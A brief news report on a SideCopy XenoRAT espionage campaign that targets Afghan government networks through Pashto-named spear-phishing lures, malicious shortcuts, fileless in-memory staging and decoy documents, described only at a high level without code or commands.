SECURITY researchers identified a cyber espionage campaign involving a SideCopy XenoRAT malware attack targeting Afghan government networks. The campaign employs spear-phishing emails with localized Pashto filenames to deliver a malicious shortcut. This triggers a fileless attack, utilizing legitimate Windows tools to fetch further malicious payloads. The malware operates silently by staging its activities in memory, complicating detection.
It also delivers a realistic decoy document to distract victims while the installation occurs. The operation highlights the need for enhanced defenses against sophisticated cyber threats, especially those with geopolitical motives.